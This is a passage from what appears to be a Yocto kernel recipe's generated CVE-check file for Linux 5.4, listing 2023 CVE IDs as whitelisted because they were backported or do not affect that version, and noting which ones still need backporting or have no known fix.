7634CVE_CHECK_WHITELIST += "CVE-2023-2166"
7635
7636# CVE-2023-2176 needs backporting (fixed from 6.3rc1)
7637
7638# cpe-stable-backport: Backported in 5.4.209
7639CVE_CHECK_WHITELIST += "CVE-2023-2177"
7640
7641# cpe-stable-backport: Backported in 5.4.240
7642CVE_CHECK_WHITELIST += "CVE-2023-2194"
7643
7644# fixed-version: only affects 5.13rc1 onwards
7645CVE_CHECK_WHITELIST += "CVE-2023-2235"
7646
7647# fixed-version: only affects 5.19rc1 onwards
7648CVE_CHECK_WHITELIST += "CVE-2023-2236"
7649
7650# cpe-stable-backport: Backported in 5.4.242
7651CVE_CHECK_WHITELIST += "CVE-2023-2248"
7652
7653# cpe-stable-backport: Backported in 5.4.243
7654CVE_CHECK_WHITELIST += "CVE-2023-2269"
7655
7656# CVE-2023-22995 needs backporting (fixed from 5.17rc1)
7657
7658# fixed-version: only affects 5.16rc1 onwards
7659CVE_CHECK_WHITELIST += "CVE-2023-22996"
7660
7661# fixed-version: only affects 5.17rc1 onwards
7662CVE_CHECK_WHITELIST += "CVE-2023-22997"
7663
7664# fixed-version: only affects 5.7rc1 onwards
7665CVE_CHECK_WHITELIST += "CVE-2023-22998"
7666
7667# fixed-version: only affects 5.12rc1 onwards
7668CVE_CHECK_WHITELIST += "CVE-2023-22999"
7669
7670# CVE-2023-23000 needs backporting (fixed from 5.17rc1)
7671
7672# fixed-version: only affects 5.11rc1 onwards
7673CVE_CHECK_WHITELIST += "CVE-2023-23001"
7674
7675# fixed-version: only affects 5.7rc1 onwards
7676CVE_CHECK_WHITELIST += "CVE-2023-23002"
7677
7678# fixed-version: only affects 5.16rc1 onwards
7679CVE_CHECK_WHITELIST += "CVE-2023-23003"
7680
7681# CVE-2023-23004 needs backporting (fixed from 5.19rc1)
7682
7683# fixed-version: only affects 6.1rc1 onwards
7684CVE_CHECK_WHITELIST += "CVE-2023-23005"
7685
7686# cpe-stable-backport: Backported in 5.4.170
7687CVE_CHECK_WHITELIST += "CVE-2023-23006"
7688
7689# CVE-2023-23039 has no known resolution
7690
7691# cpe-stable-backport: Backported in 5.4.229
7692CVE_CHECK_WHITELIST += "CVE-2023-23454"
7693
7694# cpe-stable-backport: Backported in 5.4.229
7695CVE_CHECK_WHITELIST += "CVE-2023-23455"
7696
7697# cpe-stable-backport: Backported in 5.4.231
7698CVE_CHECK_WHITELIST += "CVE-2023-23559"
7699
7700# fixed-version: only affects 5.10rc1 onwards
7701CVE_CHECK_WHITELIST += "CVE-2023-23586"
7702
7703# fixed-version: only affects 5.18rc1 onwards
7704CVE_CHECK_WHITELIST += "CVE-2023-2430"
7705
7706# cpe-stable-backport: Backported in 5.4.240
7707CVE_CHECK_WHITELIST += "CVE-2023-2483"
7708
7709# fixed-version: only affects 5.6rc4 onwards
7710CVE_CHECK_WHITELIST += "CVE-2023-25012"
7711
7712# cpe-stable-backport: Backported in 5.4.242
7713CVE_CHECK_WHITELIST += "CVE-2023-2513"
7714
7715# fixed-version: only affects 5.14rc1 onwards
7716CVE_CHECK_WHITELIST += "CVE-2023-25775"
7717
7718# fixed-version: only affects 6.3rc1 onwards
7719CVE_CHECK_WHITELIST += "CVE-2023-2598"
7720
7721# CVE-2023-26242 has no known resolution
7722
7723# CVE-2023-2640 has no known resolution
7724
7725# fixed-version: only affects 5.15rc1 onwards
7726CVE_CHECK_WHITELIST += "CVE-2023-26544"
7727
7728# cpe-stable-backport: Backported in 5.4.232
7729CVE_CHECK_WHITELIST += "CVE-2023-26545"
7730
7731# fixed-version: only affects 6.1rc1 onwards
7732CVE_CHECK_WHITELIST += "CVE-2023-26605"
7733
7734# fixed-version: only affects 5.15rc1 onwards
7735CVE_CHECK_WHITELIST += "CVE-2023-26606"
7736
7737# cpe-stable-backport: Backported in 5.4.225
7738CVE_CHECK_WHITELIST += "CVE-2023-26607"
7739
7740# cpe-stable-backport: Backported in 5.4.227
7741CVE_CHECK_WHITELIST += "CVE-2023-28327"
7742
7743# cpe-stable-backport: Backported in 5.4.229
7744CVE_CHECK_WHITELIST += "CVE-2023-28328"
7745
7746# fixed-version: only affects 5.8rc1 onwards
7747CVE_CHECK_WHITELIST += "CVE-2023-28410"
7748
7749# fixed-version: only affects 6.3rc1 onwards
7750CVE_CHECK_WHITELIST += "CVE-2023-28464"
7751
7752# cpe-stable-backport: Backported in 5.4.240
7753CVE_CHECK_WHITELIST += "CVE-2023-28466"
7754
7755# cpe-stable-backport: Backported in 5.4.213
7756CVE_CHECK_WHITELIST += "CVE-2023-2860"
7757
7758# CVE-2023-28746 needs backporting (fixed from 6.9rc1)
7759
7760# cpe-stable-backport: Backported in 5.4.133
7761CVE_CHECK_WHITELIST += "CVE-2023-28772"
7762
7763# fixed-version: only affects 5.17rc1 onwards
7764CVE_CHECK_WHITELIST += "CVE-2023-28866"
7765
7766# fixed-version: only affects 5.8rc1 onwards
7767CVE_CHECK_WHITELIST += "CVE-2023-2898"
7768
7769# cpe-stable-backport: Backported in 5.4.235
7770CVE_CHECK_WHITELIST += "CVE-2023-2985"
7771
7772# cpe-stable-backport: Backported in 5.4.253
7773CVE_CHECK_WHITELIST += "CVE-2023-3006"
7774
7775# Skipping CVE-2023-3022, no affected_versions
7776
7777# cpe-stable-backport: Backported in 5.4.238
7778CVE_CHECK_WHITELIST += "CVE-2023-30456"
7779
7780# cpe-stable-backport: Backported in 5.4.240
7781CVE_CHECK_WHITELIST += "CVE-2023-30772"
7782
7783# cpe-stable-backport: Backported in 5.4.244
7784CVE_CHECK_WHITELIST += "CVE-2023-3090"
7785
7786# fixed-version: Fixed after version 4.8rc7
7787CVE_CHECK_WHITELIST += "CVE-2023-3106"
7788
7789# Skipping CVE-2023-3108, no affected_versions
7790
7791# CVE-2023-31081 has no known resolution
7792
7793# CVE-2023-31082 has no known resolution
7794
7795# CVE-2023-31083 needs backporting (fixed from 6.6rc1)
7796
7797# CVE-2023-31084 needs backporting (fixed from 6.4rc3)
7798
7799# cpe-stable-backport: Backported in 5.4.258
7800CVE_CHECK_WHITELIST += "CVE-2023-31085"
7801
7802# cpe-stable-backport: Backported in 5.4.247
7803CVE_CHECK_WHITELIST += "CVE-2023-3111"
7804
7805# cpe-stable-backport: Backported in 5.4.251
7806CVE_CHECK_WHITELIST += "CVE-2023-3117"
7807
7808# fixed-version: only affects 5.9rc1 onwards
7809CVE_CHECK_WHITELIST += "CVE-2023-31248"
7810
7811# cpe-stable-backport: Backported in 5.4.244
7812CVE_CHECK_WHITELIST += "CVE-2023-3141"
7813
7814# cpe-stable-backport: Backported in 5.4.242
7815CVE_CHECK_WHITELIST += "CVE-2023-31436"
7816
7817# cpe-stable-backport: Backported in 5.4.193
7818CVE_CHECK_WHITELIST += "CVE-2023-3159"
7819
7820# cpe-stable-backport: Backported in 5.4.232
7821CVE_CHECK_WHITELIST += "CVE-2023-3161"
7822
7823# cpe-stable-backport: Backported in 5.4.251
7824CVE_CHECK_WHITELIST += "CVE-2023-3212"
7825
7826# cpe-stable-backport: Backported in 5.4.235
7827CVE_CHECK_WHITELIST += "CVE-2023-3220"
7828
7829# cpe-stable-backport: Backported in 5.4.243
7830CVE_CHECK_WHITELIST += "CVE-2023-32233"
7831
7832# fixed-version: only affects 5.15rc1 onwards
7833CVE_CHECK_WHITELIST += "CVE-2023-32247"
7834
7835# fixed-version: only affects 5.15rc1 onwards
7836CVE_CHECK_WHITELIST += "CVE-2023-32248"
7837
7838# fixed-version: only affects 5.15rc1 onwards
7839CVE_CHECK_WHITELIST += "CVE-2023-32250"
7840
7841# fixed-version: only affects 5.15rc1 onwards
7842CVE_CHECK_WHITELIST += "CVE-2023-32252"
7843
7844# fixed-version: only affects 5.15rc1 onwards
7845CVE_CHECK_WHITELIST += "CVE-2023-32254"
7846
7847# fixed-version: only affects 5.15rc1 onwards
7848CVE_CHECK_WHITELIST += "CVE-2023-32257"
7849
7850# fixed-version: only affects 5.15rc1 onwards
7851CVE_CHECK_WHITELIST += "CVE-2023-32258"
7852
7853# cpe-stable-backport: Backported in 5.4.232
7854CVE_CHECK_WHITELIST += "CVE-2023-32269"
7855
7856# CVE-2023-32629 has no known resolution
7857
7858# cpe-stable-backport: Backported in 5.4.243
7859CVE_CHECK_WHITELIST += "CVE-2023-3268"
7860
7861# fixed-version: only affects 6.1rc1 onwards
7862CVE_CHECK_WHITELIST += "CVE-2023-3269"
7863
7864# fixed-version: only affects 6.2rc1 onwards
7865CVE_CHECK_WHITELIST += "CVE-2023-3312"
7866
7867# fixed-version: only affects 6.2rc1 onwards
7868CVE_CHECK_WHITELIST += "CVE-2023-3317"
7869
7870# cpe-stable-backport: Backported in 5.4.240
7871CVE_CHECK_WHITELIST += "CVE-2023-33203"
7872
7873# fixed-version: only affects 6.2rc1 onwards
7874CVE_CHECK_WHITELIST += "CVE-2023-33250"
7875
7876# CVE-2023-33288 needs backporting (fixed from 6.3rc4)
7877
7878# cpe-stable-backport: Backported in 5.4.248
7879CVE_CHECK_WHITELIST += "CVE-2023-3338"
7880
7881# fixed-version: only affects 5.11rc1 onwards
7882CVE_CHECK_WHITELIST += "CVE-2023-3355"
7883
7884# fixed-version: only affects 5.11rc1 onwards
7885CVE_CHECK_WHITELIST += "CVE-2023-3357"
7886
7887# cpe-stable-backport: Backported in 5.4.231
7888CVE_CHECK_WHITELIST += "CVE-2023-3358"
7889
7890# fixed-version: only affects 5.18rc1 onwards
7891CVE_CHECK_WHITELIST += "CVE-2023-3359"
7892
7893# CVE-2023-3389 needs backporting (fixed from 6.0rc1)
7894
7895# cpe-stable-backport: Backported in 5.4.251
7896CVE_CHECK_WHITELIST += "CVE-2023-3390"
7897
7898# fixed-version: only affects 5.17rc1 onwards
7899CVE_CHECK_WHITELIST += "CVE-2023-33951"
7900
7901# fixed-version: only affects 5.17rc1 onwards
7902CVE_CHECK_WHITELIST += "CVE-2023-33952"
7903
7904# CVE-2023-3397 has no known resolution
7905
7906# cpe-stable-backport: Backported in 5.4.249
7907CVE_CHECK_WHITELIST += "CVE-2023-34255"
7908
7909# cpe-stable-backport: Backported in 5.4.243
7910CVE_CHECK_WHITELIST += "CVE-2023-34256"
7911
7912# fixed-version: only affects 6.1 onwards
7913CVE_CHECK_WHITELIST += "CVE-2023-34319"
7914
7915# fixed-version: only affects 5.10rc1 onwards
7916CVE_CHECK_WHITELIST += "CVE-2023-34324"
7917
7918# fixed-version: only affects 5.15rc1 onwards
7919CVE_CHECK_WHITELIST += "CVE-2023-3439"
7920
7921# cpe-stable-backport: Backported in 5.4.251
7922CVE_CHECK_WHITELIST += "CVE-2023-35001"
7923
7924# cpe-stable-backport: Backported in 5.4.232
7925CVE_CHECK_WHITELIST += "CVE-2023-3567"
7926
7927# CVE-2023-35693 has no known resolution
7928
7929# cpe-stable-backport: Backported in 5.4.246
7930CVE_CHECK_WHITELIST += "CVE-2023-35788"
7931
7932# cpe-stable-backport: Backported in 5.4.243
7933CVE_CHECK_WHITELIST += "CVE-2023-35823"
7934
7935# cpe-stable-backport: Backported in 5.4.243
7936CVE_CHECK_WHITELIST += "CVE-2023-35824"
7937
7938# fixed-version: only affects 5.18rc1 onwards
7939CVE_CHECK_WHITELIST += "CVE-2023-35826"
7940
7941# cpe-stable-backport: Backported in 5.4.259
7942CVE_CHECK_WHITELIST += "CVE-2023-35827"
7943
7944# cpe-stable-backport: Backported in 5.4.243
7945CVE_CHECK_WHITELIST += "CVE-2023-35828"
7946
7947# fixed-version: only affects 5.8rc1 onwards
7948CVE_CHECK_WHITELIST += "CVE-2023-35829"
7949
7950# cpe-stable-backport: Backported in 5.4.248
7951CVE_CHECK_WHITELIST += "CVE-2023-3609"
7952
7953# fixed-version: only affects 5.9rc1 onwards
7954CVE_CHECK_WHITELIST += "CVE-2023-3610"
7955
7956# cpe-stable-backport: Backported in 5.4.253
7957CVE_CHECK_WHITELIST += "CVE-2023-3611"
7958
7959# CVE-2023-3640 has no known resolution
7960
7961# fixed-version: only affects 6.3rc1 onwards
7962CVE_CHECK_WHITELIST += "CVE-2023-37453"
7963
7964# CVE-2023-37454 has no known resolution
7965
7966# cpe-stable-backport: Backported in 5.4.255
7967CVE_CHECK_WHITELIST += "CVE-2023-3772"
7968
7969# fixed-version: only affects 5.17rc1 onwards
7970CVE_CHECK_WHITELIST += "CVE-2023-3773"
7971
7972# cpe-stable-backport: Backported in 5.4.251
7973CVE_CHECK_WHITELIST += "CVE-2023-3776"
7974
7975# fixed-version: only affects 5.9rc1 onwards
7976CVE_CHECK_WHITELIST += "CVE-2023-3777"
7977
7978# cpe-stable-backport: Backported in 5.4.224
7979CVE_CHECK_WHITELIST += "CVE-2023-3812"
7980
7981# fixed-version: only affects 5.19rc1 onwards
7982CVE_CHECK_WHITELIST += "CVE-2023-38409"
7983
7984# fixed-version: only affects 5.15rc1 onwards
7985CVE_CHECK_WHITELIST += "CVE-2023-38426"
7986
7987# fixed-version: only affects 5.15rc1 onwards
7988CVE_CHECK_WHITELIST += "CVE-2023-38427"
7989
7990# fixed-version: only affects 5.15rc1 onwards
7991CVE_CHECK_WHITELIST += "CVE-2023-38428"
7992
7993# fixed-version: only affects 5.15rc1 onwards
7994CVE_CHECK_WHITELIST += "CVE-2023-38429"
7995
7996# fixed-version: only affects 5.15rc1 onwards
7997CVE_CHECK_WHITELIST += "CVE-2023-38430"
7998
7999# fixed-version: only affects 5.15rc1 onwards
8000CVE_CHECK_WHITELIST += "CVE-2023-38431"
8001
8002# fixed-version: only affects 5.15rc1 onwards
8003CVE_CHECK_WHITELIST += "CVE-2023-38432"
8004
8005# cpe-stable-backport: Backported in 5.4.251
8006CVE_CHECK_WHITELIST += "CVE-2023-3863"
8007
8008# fixed-version: only affects 5.15rc1 onwards
8009CVE_CHECK_WHITELIST += "CVE-2023-3865"
8010
8011# fixed-version: only affects 5.15rc1 onwards
8012CVE_CHECK_WHITELIST += "CVE-2023-3866"
8013
8014# fixed-version: only affects 5.15rc1 onwards
8015CVE_CHECK_WHITELIST += "CVE-2023-3867"
8016
8017# cpe-stable-backport: Backported in 5.4.257
8018CVE_CHECK_WHITELIST += "CVE-2023-39189"
8019
8020# fixed-version: only affects 5.19rc1 onwards
8021CVE_CHECK_WHITELIST += "CVE-2023-39191"
8022
8023# cpe-stable-backport: Backported in 5.4.257
8024CVE_CHECK_WHITELIST += "CVE-2023-39192"
8025
8026# cpe-stable-backport: Backported in 5.4.257
8027CVE_CHECK_WHITELIST += "CVE-2023-39193"
8028
8029# cpe-stable-backport: Backported in 5.4.255
8030CVE_CHECK_WHITELIST += "CVE-2023-39194"
8031
8032# cpe-stable-backport: Backported in 5.4.251
8033CVE_CHECK_WHITELIST += "CVE-2023-39197"
8034
8035# CVE-2023-39198 needs backporting (fixed from 6.5rc7)
8036
8037# fixed-version: only affects 5.6rc1 onwards
8038CVE_CHECK_WHITELIST += "CVE-2023-4004"
8039
8040# CVE-2023-4010 has no known resolution
8041
8042# fixed-version: only affects 5.9rc1 onwards
8043CVE_CHECK_WHITELIST += "CVE-2023-4015"
8044
8045# cpe-stable-backport: Backported in 5.4.253
8046CVE_CHECK_WHITELIST += "CVE-2023-40283"
8047
8048# fixed-version: only affects 6.3rc1 onwards
8049CVE_CHECK_WHITELIST += "CVE-2023-40791"
8050
8051# cpe-stable-backport: Backported in 5.4.253
8052CVE_CHECK_WHITELIST += "CVE-2023-4128"
8053
8054# cpe-stable-backport: Backported in 5.4.251
8055CVE_CHECK_WHITELIST += "CVE-2023-4132"
8056
8057# CVE-2023-4133 needs backporting (fixed from 6.3)
8058
8059# CVE-2023-4134 needs backporting (fixed from 6.5rc1)
8060
8061# fixed-version: only affects 5.9rc1 onwards
8062CVE_CHECK_WHITELIST += "CVE-2023-4147"
8063
8064# fixed-version: only affects 5.11rc1 onwards
8065CVE_CHECK_WHITELIST += "CVE-2023-4155"
8066
8067# fixed-version: only affects 6.3rc1 onwards
8068CVE_CHECK_WHITELIST += "CVE-2023-4194"
8069
8070# cpe-stable-backport: Backported in 5.4.253
8071CVE_CHECK_WHITELIST += "CVE-2023-4206"
8072
8073# cpe-stable-backport: Backported in 5.4.253
8074CVE_CHECK_WHITELIST += "CVE-2023-4207"
8075
8076# cpe-stable-backport: Backported in 5.4.253
8077CVE_CHECK_WHITELIST += "CVE-2023-4208"
8078
8079# fixed-version: only affects 5.6rc1 onwards
8080CVE_CHECK_WHITELIST += "CVE-2023-4244"
8081
8082# fixed-version: only affects 5.7rc1 onwards
8083CVE_CHECK_WHITELIST += "CVE-2023-4273"
8084
8085# cpe-stable-backport: Backported in 5.4.257
8086CVE_CHECK_WHITELIST += "CVE-2023-42752"
8087
8088# cpe-stable-backport: Backported in 5.4.257
8089CVE_CHECK_WHITELIST += "CVE-2023-42753"
8090
8091# cpe-stable-backport: Backported in 5.4.258
8092CVE_CHECK_WHITELIST += "CVE-2023-42754"
8093
8094# cpe-stable-backport: Backported in 5.4.257
8095CVE_CHECK_WHITELIST += "CVE-2023-42755"
8096
8097# fixed-version: only affects 6.4rc6 onwards
8098CVE_CHECK_WHITELIST += "CVE-2023-42756"
8099
8100# cpe-stable-backport: Backported in 5.4.198
8101CVE_CHECK_WHITELIST += "CVE-2023-4385"
8102
8103# cpe-stable-backport: Backported in 5.4.196
8104CVE_CHECK_WHITELIST += "CVE-2023-4387"
8105
8106# fixed-version: only affects 5.7rc1 onwards
8107CVE_CHECK_WHITELIST += "CVE-2023-4389"
8108
8109# fixed-version: only affects 5.16rc1 onwards
8110CVE_CHECK_WHITELIST += "CVE-2023-4394"
8111
8112# fixed-version: only affects 5.11rc1 onwards
8113CVE_CHECK_WHITELIST += "CVE-2023-44466"
8114
8115# cpe-stable-backport: Backported in 5.4.196
8116CVE_CHECK_WHITELIST += "CVE-2023-4459"
8117
8118# fixed-version: only affects 5.6rc1 onwards
8119CVE_CHECK_WHITELIST += "CVE-2023-4563"
8120
8121# fixed-version: only affects 5.13rc1 onwards
8122CVE_CHECK_WHITELIST += "CVE-2023-4569"
8123
8124# cpe-stable-backport: Backported in 5.4.235
8125CVE_CHECK_WHITELIST += "CVE-2023-45862"
8126
8127# cpe-stable-backport: Backported in 5.4.260
8128CVE_CHECK_WHITELIST += "CVE-2023-45863"
8129
8130# cpe-stable-backport: Backported in 5.4.257
8131CVE_CHECK_WHITELIST += "CVE-2023-45871"
8132
8133# fixed-version: only affects 6.5rc1 onwards
8134CVE_CHECK_WHITELIST += "CVE-2023-45898"
8135
8136# fixed-version: only affects 6.4rc1 onwards
8137CVE_CHECK_WHITELIST += "CVE-2023-4610"
8138
8139# fixed-version: only affects 6.4rc1 onwards
8140CVE_CHECK_WHITELIST += "CVE-2023-4611"
8141
8142# CVE-2023-4622 needs backporting (fixed from 6.5rc1)
8143
8144# cpe-stable-backport: Backported in 5.4.257
8145CVE_CHECK_WHITELIST += "CVE-2023-4623"
8146
8147# cpe-stable-backport: Backported in 5.4.259
8148CVE_CHECK_WHITELIST += "CVE-2023-46343"
8149
8150# fixed-version: only affects 5.10rc1 onwards
8151CVE_CHECK_WHITELIST += "CVE-2023-46813"
8152
8153# cpe-stable-backport: Backported in 5.4.268
8154CVE_CHECK_WHITELIST += "CVE-2023-46838"
8155
8156# fixed-version: only affects 5.10rc1 onwards
8157CVE_CHECK_WHITELIST += "CVE-2023-46862"
8158
8159# CVE-2023-47233 needs backporting (fixed from 6.9rc1)
8160
8161# fixed-version: only affects 5.7rc1 onwards
8162CVE_CHECK_WHITELIST += "CVE-2023-4732"
8163
8164# CVE-2023-4881 needs backporting (fixed from 6.6rc1)
8165
8166# cpe-stable-backport: Backported in 5.4.257
8167CVE_CHECK_WHITELIST += "CVE-2023-4921"
8168
8169# CVE-2023-50431 needs backporting (fixed from 6.8rc1)
8170
8171# fixed-version: only affects 6.0rc1 onwards
8172CVE_CHECK_WHITELIST += "CVE-2023-5090"
8173
8174# cpe-stable-backport: Backported in 5.4.255
8175CVE_CHECK_WHITELIST += "CVE-2023-51042"
8176
8177# cpe-stable-backport: Backported in 5.4.251
8178CVE_CHECK_WHITELIST += "CVE-2023-51043"
8179
8180# fixed-version: only affects 5.13rc1 onwards
8181CVE_CHECK_WHITELIST += "CVE-2023-5158"
8182
8183# CVE-2023-51779 needs backporting (fixed from 6.7rc7)
8184
8185# cpe-stable-backport: Backported in 5.4.260
8186CVE_CHECK_WHITELIST += "CVE-2023-5178"
8187
8188# cpe-stable-backport: Backported in 5.4.265
8189CVE_CHECK_WHITELIST += "CVE-2023-51780"
8190
8191# cpe-stable-backport: Backported in 5.4.265
8192CVE_CHECK_WHITELIST += "CVE-2023-51781"
8193
8194# cpe-stable-backport: Backported in 5.4.265
8195CVE_CHECK_WHITELIST += "CVE-2023-51782"
8196
8197# fixed-version: only affects 5.9rc1 onwards
8198CVE_CHECK_WHITELIST += "CVE-2023-5197"
8199
8200# cpe-stable-backport: Backported in 5.4.267
8201CVE_CHECK_WHITELIST += "CVE-2023-52340"
8202
8203# CVE-2023-52429 needs backporting (fixed from 6.8rc3)
8204
8205# fixed-version: only affects 6.5rc6 onwards
8206CVE_CHECK_WHITELIST += "CVE-2023-52433"
8207
8208# CVE-2023-52434 needs backporting (fixed from 6.7rc6)
8209
8210# cpe-stable-backport: Backported in 5.4.269
8211CVE_CHECK_WHITELIST += "CVE-2023-52435"
8212
8213# cpe-stable-backport: Backported in 5.4.268
8214CVE_CHECK_WHITELIST += "CVE-2023-52436"
8215
8216# cpe-stable-backport: Backported in 5.4.268
8217CVE_CHECK_WHITELIST += "CVE-2023-52438"
8218
8219# cpe-stable-backport: Backported in 5.4.268
8220CVE_CHECK_WHITELIST += "CVE-2023-52439"
8221
8222# fixed-version: only affects 5.17rc4 onwards
8223CVE_CHECK_WHITELIST += "CVE-2023-52440"
8224
8225# fixed-version: only affects 5.15rc1 onwards
8226CVE_CHECK_WHITELIST += "CVE-2023-52441"
8227
8228# CVE-2023-52442 needs backporting (fixed from 6.5rc4)
8229
8230# cpe-stable-backport: Backported in 5.4.268
8231CVE_CHECK_WHITELIST += "CVE-2023-52443"
8232
8233# cpe-stable-backport: Backported in 5.4.268
8234CVE_CHECK_WHITELIST += "CVE-2023-52444"
8235
8236# cpe-stable-backport: Backported in 5.4.268
8237CVE_CHECK_WHITELIST += "CVE-2023-52445"
8238
8239# fixed-version: only affects 6.2rc1 onwards
8240CVE_CHECK_WHITELIST += "CVE-2023-52446"
8241
8242# fixed-version: only affects 5.9rc1 onwards
8243CVE_CHECK_WHITELIST += "CVE-2023-52447"
8244
8245# cpe-stable-backport: Backported in 5.4.268
8246CVE_CHECK_WHITELIST += "CVE-2023-52448"
8247
8248# cpe-stable-backport: Backported in 5.4.268
8249CVE_CHECK_WHITELIST += "CVE-2023-52449"
8250
8251# fixed-version: only affects 6.2rc1 onwards
8252CVE_CHECK_WHITELIST += "CVE-2023-52450"
8253
8254# cpe-stable-backport: Backported in 5.4.268
8255CVE_CHECK_WHITELIST += "CVE-2023-52451"
8256
8257# fixed-version: only affects 5.12rc1 onwards
8258CVE_CHECK_WHITELIST += "CVE-2023-52452"
8259
8260# fixed-version: only affects 6.2rc1 onwards
8261CVE_CHECK_WHITELIST += "CVE-2023-52453"
8262
8263# cpe-stable-backport: Backported in 5.4.268
8264CVE_CHECK_WHITELIST += "CVE-2023-52454"
8265
8266# fixed-version: only affects 6.3rc1 onwards
8267CVE_CHECK_WHITELIST += "CVE-2023-52455"
8268
8269# fixed-version: only affects 5.9rc1 onwards
8270CVE_CHECK_WHITELIST += "CVE-2023-52456"
8271
8272# fixed-version: only affects 6.1rc6 onwards
8273CVE_CHECK_WHITELIST += "CVE-2023-52457"
8274
8275# CVE-2023-52458 needs backporting (fixed from 6.8rc1)
8276
8277# fixed-version: only affects 6.6rc1 onwards
8278CVE_CHECK_WHITELIST += "CVE-2023-52459"
8279
8280# fixed-version: only affects 6.7rc1 onwards
8281CVE_CHECK_WHITELIST += "CVE-2023-52460"
8282
8283# fixed-version: only affects 6.7rc1 onwards
8284CVE_CHECK_WHITELIST += "CVE-2023-52461"
8285
8286# fixed-version: only affects 5.16rc1 onwards
8287CVE_CHECK_WHITELIST += "CVE-2023-52462"
8288
8289# fixed-version: only affects 5.8rc7 onwards
8290CVE_CHECK_WHITELIST += "CVE-2023-52463"
8291
8292# cpe-stable-backport: Backported in 5.4.268
8293CVE_CHECK_WHITELIST += "CVE-2023-52464"
8294
8295# fixed-version: only affects 6.5rc1 onwards
8296CVE_CHECK_WHITELIST += "CVE-2023-52465"
8297
8298# fixed-version: only affects 5.9rc1 onwards
8299CVE_CHECK_WHITELIST += "CVE-2023-52467"
8300
8301# fixed-version: only affects 6.4rc1 onwards
8302CVE_CHECK_WHITELIST += "CVE-2023-52468"
8303
8304# cpe-stable-backport: Backported in 5.4.268
8305CVE_CHECK_WHITELIST += "CVE-2023-52469"
8306
8307# cpe-stable-backport: Backported in 5.4.268
8308CVE_CHECK_WHITELIST += "CVE-2023-52470"
8309
8310# fixed-version: only affects 6.7rc1 onwards
8311CVE_CHECK_WHITELIST += "CVE-2023-52471"
8312
8313# fixed-version: only affects 6.5rc1 onwards
8314CVE_CHECK_WHITELIST += "CVE-2023-52472"
8315
8316# fixed-version: only affects 6.4rc1 onwards
8317CVE_CHECK_WHITELIST += "CVE-2023-52473"
8318
8319# CVE-2023-52474 needs backporting (fixed from 6.4rc1)
8320
8321# cpe-stable-backport: Backported in 5.4.259
8322CVE_CHECK_WHITELIST += "CVE-2023-52475"
8323
8324# CVE-2023-52476 needs backporting (fixed from 6.6rc6)
8325
8326# cpe-stable-backport: Backported in 5.4.259
8327CVE_CHECK_WHITELIST += "CVE-2023-52477"
8328
8329# cpe-stable-backport: Backported in 5.4.259
8330CVE_CHECK_WHITELIST += "CVE-2023-52478"
8331
8332# CVE-2023-52479 needs backporting (fixed from 6.6rc5)
8333
8334# CVE-2023-52480 needs backporting (fixed from 6.6rc5)
8335
8336# CVE-2023-52481 needs backporting (fixed from 6.6rc5)
8337
8338# CVE-2023-52482 needs backporting (fixed from 6.6rc4)
8339
8340# fixed-version: only affects 5.15rc1 onwards
8341CVE_CHECK_WHITELIST += "CVE-2023-52483"
8342
8343# CVE-2023-52484 needs backporting (fixed from 6.6rc5)
8344
8345# CVE-2023-52485 needs backporting (fixed from 6.8rc1)
8346
8347# cpe-stable-backport: Backported in 5.4.269
8348CVE_CHECK_WHITELIST += "CVE-2023-52486"
8349
8350# fixed-version: only affects 6.5rc1 onwards
8351CVE_CHECK_WHITELIST += "CVE-2023-52487"
8352
8353# CVE-2023-52488 needs backporting (fixed from 6.8rc1)
8354
8355# CVE-2023-52489 needs backporting (fixed from 6.8rc1)
8356
8357# fixed-version: only affects 6.3rc1 onwards
8358CVE_CHECK_WHITELIST += "CVE-2023-52490"
8359
8360# CVE-2023-52491 needs backporting (fixed from 6.8rc1)
8361
8362# fixed-version: only affects 5.6rc1 onwards
8363CVE_CHECK_WHITELIST += "CVE-2023-52492"
8364
8365# fixed-version: only affects 5.7rc1 onwards
8366CVE_CHECK_WHITELIST += "CVE-2023-52493"
8367
8368# fixed-version: only affects 5.13rc1 onwards
8369CVE_CHECK_WHITELIST += "CVE-2023-52494"
8370
8371# fixed-version: only affects 6.3rc1 onwards
8372CVE_CHECK_WHITELIST += "CVE-2023-52495"
8373
8374# CVE-2023-52497 needs backporting (fixed from 6.8rc1)
8375
8376# CVE-2023-52498 needs backporting (fixed from 6.8rc1)
8377
8378# fixed-version: only affects 5.12rc1 onwards
8379CVE_CHECK_WHITELIST += "CVE-2023-52499"
8380
8381# CVE-2023-52500 needs backporting (fixed from 6.6rc2)
8382
8383# CVE-2023-52501 needs backporting (fixed from 6.6rc2)
8384
8385# cpe-stable-backport: Backported in 5.4.259
8386CVE_CHECK_WHITELIST += "CVE-2023-52502"
8387
8388# fixed-version: only affects 5.6rc1 onwards
8389CVE_CHECK_WHITELIST += "CVE-2023-52503"
8390
8391# cpe-stable-backport: Backported in 5.4.270
8392CVE_CHECK_WHITELIST += "CVE-2023-52504"
8393
8394# fixed-version: only affects 5.18rc1 onwards
8395CVE_CHECK_WHITELIST += "CVE-2023-52505"
8396
8397# CVE-2023-52506 needs backporting (fixed from 6.6rc3)
8398
8399# cpe-stable-backport: Backported in 5.4.259
8400CVE_CHECK_WHITELIST += "CVE-2023-52507"
8401
8402# CVE-2023-52508 needs backporting (fixed from 6.6rc2)
8403
8404# cpe-stable-backport: Backported in 5.4.259
8405CVE_CHECK_WHITELIST += "CVE-2023-52509"
8406
8407# cpe-stable-backport: Backported in 5.4.259
8408CVE_CHECK_WHITELIST += "CVE-2023-52510"
8409
8410# CVE-2023-52511 needs backporting (fixed from 6.6rc1)
8411
8412# fixed-version: only affects 5.18rc1 onwards
8413CVE_CHECK_WHITELIST += "CVE-2023-52512"
8414
8415# cpe-stable-backport: Backported in 5.4.258
8416CVE_CHECK_WHITELIST += "CVE-2023-52513"
8417
8418# CVE-2023-52515 needs backporting (fixed from 6.6rc5)
8419
8420# CVE-2023-52516 needs backporting (fixed from 6.6rc1)
8421
8422# CVE-2023-52517 needs backporting (fixed from 6.6rc1)
8423
8424# fixed-version: only affects 5.16rc1 onwards
8425CVE_CHECK_WHITELIST += "CVE-2023-52518"
8426
8427# CVE-2023-52519 needs backporting (fixed from 6.6rc5)
8428
8429# fixed-version: only affects 5.14rc1 onwards
8430CVE_CHECK_WHITELIST += "CVE-2023-52520"
8431
8432# cpe-stable-backport: Backported in 5.4.258
8433CVE_CHECK_WHITELIST += "CVE-2023-52522"
8434
8435# fixed-version: only affects 5.13rc1 onwards
8436CVE_CHECK_WHITELIST += "CVE-2023-52523"
8437
8438# fixed-version: only affects 6.5rc1 onwards
